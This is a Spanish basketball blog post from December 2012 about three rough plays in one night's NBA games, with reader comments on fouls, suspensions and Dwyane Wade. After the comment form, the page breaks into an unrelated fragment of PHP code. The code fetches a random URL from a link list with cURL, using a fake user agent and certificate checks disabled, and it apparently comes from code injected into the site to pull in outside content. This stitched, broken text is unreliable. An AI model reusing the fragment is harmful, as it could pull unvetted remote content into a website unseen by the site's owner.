Marchando una de galletas navideñas

28 de December de 2012 por MagicJohnson32

En la misma noche del 27 de diciembre, Dwight Howard fue expulsado por golpear a Kenneth Faried en la cara, JR Smith lesionó a Goran Dragic y Dwayne Wade pateó a Ramon Sessions en la entrepierna. Cosas del espíritu navideño, suponemos.

Comenta

8 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    La falta de JR es peligrosísima, pudo haberse cargado a Dragic. Descalificante clara, creo yo.

      Citar

  2. Ruxixón dice:
    #2

    Se me ponen los pelos de punta cada vez que veo algo parecido a lo de Dragic,aparentemente no se le toca nada pero es lo justo para desequilibrarlo y tener una mala caida cuyas repercusiones pueden ser muy graves.Como Magic,para mí es descalificante.

      Citar

  3. Denise dice:
    #3

    Que mal me ha caido siempre Wade…para mi un payaso y encima siempre me ha parecido un sobrevalorado de cojones. Un par de años buenos, criar la fama y echarse a dormir…

      Citar

  4. simon dice:
    #4

    Denise:
    Que mal me ha caido siempre Wade…para mi un payaso y encima siempre me ha parecido un sobrevalorado de cojones. Un par de años buenos, criar la fama y echarse a dormir…

    No sé… irá un poco en cuestión de gustos, a mi me parece que está valorado en su justa medida. Las finales que se marcó en 2006 son de lo mejorcito que se han visto desde Michael Jordan. ( al menos hablando de un exterior ). En todas sus temporadas ha estado rozando el 50% de acierto, lo que para un exterior es un porcentaje brutal, su temporada 2008/2009 la recuerdo como absolutamente brutal. En los 9 o 10 años que lleva en la liga solo ha bajado el piston un par de veces y fue por las lesiones que ha arrastrado desde el 2006…

      Citar

  5. Denise dice:
    #5

    simon: No sé… irá un poco en cuestión de gustos, a mi me parece que está valorado en su justa medida. Las finales que se marcó en 2006 son de lo mejorcito que se han visto desde Michael Jordan. ( al menos hablando de un exterior ).En todas sus temporadas ha estado rozando el 50% de acierto, lo que para un exterior es un porcentaje brutal, su temporada 2008/2009 la recuerdo como absolutamente brutal. En los 9 o 10 años que lleva en la liga solo ha bajado el piston un par de veces y fue por las lesiones que ha arrastrado desde el 2006…

    claro, depende de gustos, y reconozco que nunca me cayó bien, pero a pesar de que sus numeros estadisticamente no se resienten, la sensación que me da es que cada vez es menos killer, no sé si influirá el jugar al lado del nº 1 del basket, pero le veo menos ejecutor, mucho mas pesado en su juego y sin mejorar su pobre tiro exterior. A día de hoy, creo que para los Heat, Bosh es más importante que Wade en Miami.

      Citar

  6. MagicJohnson32 dice:
    #6

    Ya que habláis de él, han sancionado a Wade un partido por la patada a Sessions.

    Curioso al menos que JR Smith, que es el único que lesionó al rival (Dragic se perderá al menos dos partidos), es el único que ha saludo indemne de esas tres jugadas. ¿He dicho curioso? Quería decir absurdo.

      Citar

  7. Denise dice:
    #7

    Y a Wade por qué lo sancionan con partido y a Howard solo con dinero (calderilla) ?? Joer, yo que queria ver a los Lakers esta noche con Sacre de titular….
    Ante la probable ausencia de Pau…¿D’Antoni tirará de Jamison?

      Citar

  8. MagicJohnson32 dice:
    #8

    Denise:
    Y a Wade por qué lo sancionan con partido y a Howard solo con dinero (calderilla) ?? Joer, yo que queria ver a los Lakers esta noche con Sacre de titular….
    Ante la probable ausencia de Pau…¿D’Antoni tirará de Jamison?

    Parece que Pau jugará, pero igualmente sería un buen momento para recuperar a Jamison de cara a una posible baja de Gasol si la fascitis empeora.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>